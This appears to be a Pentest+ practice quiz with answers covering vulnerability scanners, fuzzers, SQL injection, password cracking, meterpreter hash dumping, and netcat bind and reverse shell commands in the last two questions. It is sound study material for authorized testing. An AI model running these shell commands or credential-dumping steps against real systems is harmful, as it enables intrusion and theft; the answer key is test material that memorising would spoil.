CompTIA Pentest+ for Dummies Chapter 9 Prep Test

Question 1

You want to perform a vulnerability scan of a system on the network.
What tool would you use?
A.Hydra
B.Nessus
C.Maltego
D.SQLMap

Answer 1

B.Nessus

Explanation:
Nessus is a commercial vulnerability scanner that will assess your system and identify issues with it such as patches that are missing and poor security configuration

Question 2

You are performing a pentest for a company and the company Intranet server is in the scope of the assessment.
What tool would you use to determine if there are any vulnerabilities with the web server?
A.Ncat
B.Maltego
C.Hashcat
D.Nikto

Answer 2

D.Nikto

Explanation:
Nikto is an example of a web application vulnerability scanner that will assess configuration issues with the web application that makes you vulnerable to attack

Question 3

You would like to assess a core software application used by your customer while doing a penetration test.
What software assurance tool would you use to send random input to the application to assess how it responds?
A.nc
B.Hashcat
C.AFL
D.Mimikatz

Answer 3

C.AFL

Explanation:
In this scenario we are looking for a fuzzing tool.
AFL is an example of a fuzzing tool that will send arbitrary input to an application to asses how it handles the input

Question 4

You are performing an authorized pentest on a Windows server and have exploited the system with Metasploit and managed to get a meterpreter session.
What command would you use to obtain a list of password hashes for the accounts that reside on that system?
A.hashdump
B.hashit
C.sysinfo
D.hashcat

Answer 4

A.hashdump

Explanation:
hashdump is a post-exploitation command that you can use to obtain the hash values of user accounts.

After obtaining the hashes, you could then attempt to crack the password hashes with a tool like John the Ripper

Question 5

You are assessing the security of a web application that connects to a database to display inventory data.
What tool would you use to test the web application against SQL injection attacks?
A.OpenVAS
B.Medusa
C.Cain and Abel
D.SQLmap

Answer 5

D.SQLmap

Explanation:
SQLMap is a tool that you can use to automate SQL injection attacks on an application

Question 6

You are performing a pentest for Company XYZ.
You would like to generate a password list file from the contents of the customer website.
What tool would you use?
A.Medusa
B.CeWL
C.AFL
D.GDB

Answer 6

B.CeWL

Explanation:
CeWL is a tool that you can use to scan through the pages of a website and pick up on words that are used in the web pages to build a wordlist file to use with password cracking tools! :-)

Question 7

What tool would you use to crack password hashes that you have obtained in a previous step of your assessment? (Choose Two)
A.Peach Fuzzer
B.theHarvester
C.Cain and Abel
D.OWASP ZAP
E.John The Ripper

Answer 7

C.Cain and Abel
E.John The Ripper

Explanation:
You can use Cain and Abel and John the Ripper to crack password hashes

Question 8

You are looking to assess the security of a web application used by the company.
What tool would you use to assess the web application for security vulnerabilities?
A.Burp Suite
B.BeEF
C.Drozer
D.PowerSploit

Answer 8

A.Burp Suite

Explanation:
Burp Suite can be used as a web proxy and a web application vulnerability tester

Question 9

You wish to set up a bind shell on the target Windows system you are assessing whose IP address is 10.0.1.5. What command would you use on that system to set up the bind shell?
(A) nc 10.0.1.5 -p 5555 -e cmd.exe 
(B) nc -n -v -l -p 5555 -e cmd.exe 
(C) nc -10.0.1.5 -e cmd.exe 
(D) nc -n -v -p 5555 -e cmd.exe

Answer 9

(B) nc -n -v -l -p 5555 -e cmd.exe

Explanation:
Because you are looking to set up a bind shell on the target system, you are looking to set up the listener, which uses nc with a -l swtich (for listener)
In this scenario you are also working with a Windows target system, so the command to execute should be ‘cmd.exe’

Question 10

You would like to configure a reverse bind shell. Your pentester system has the IP address 10.0.1.2, while your Linux target has the IP address 10.0.1.5. What command would you use on a Linux target system for the reverse bind shell?
(A) nc -n -v 10.0.1.2 5555 -e cmd.exe
(B) nc -n -v -l 5555 10.0.1.2 -e /bin/ bash
(C) nc -n -v 10.0.1.2 5555 -e /bin/ bash
(D) nc -n -v -l 5555 10.0.1.5 -e cmd.exe

Answer 10

(C) nc -n -v 10.0.1.2 5555 -e /bin/ bash

Explanation:
In this scenario you are looking to set up a reverse shell so the listener (-l) would be on the pentesters system.

The reason I mention this is because the question is asking you what command you would use on the target, so you are looking for a command without -l.

You also are lloking for a command to use on a Linux target so -e shouild reference /bin/bash instead of ‘cmd.exe’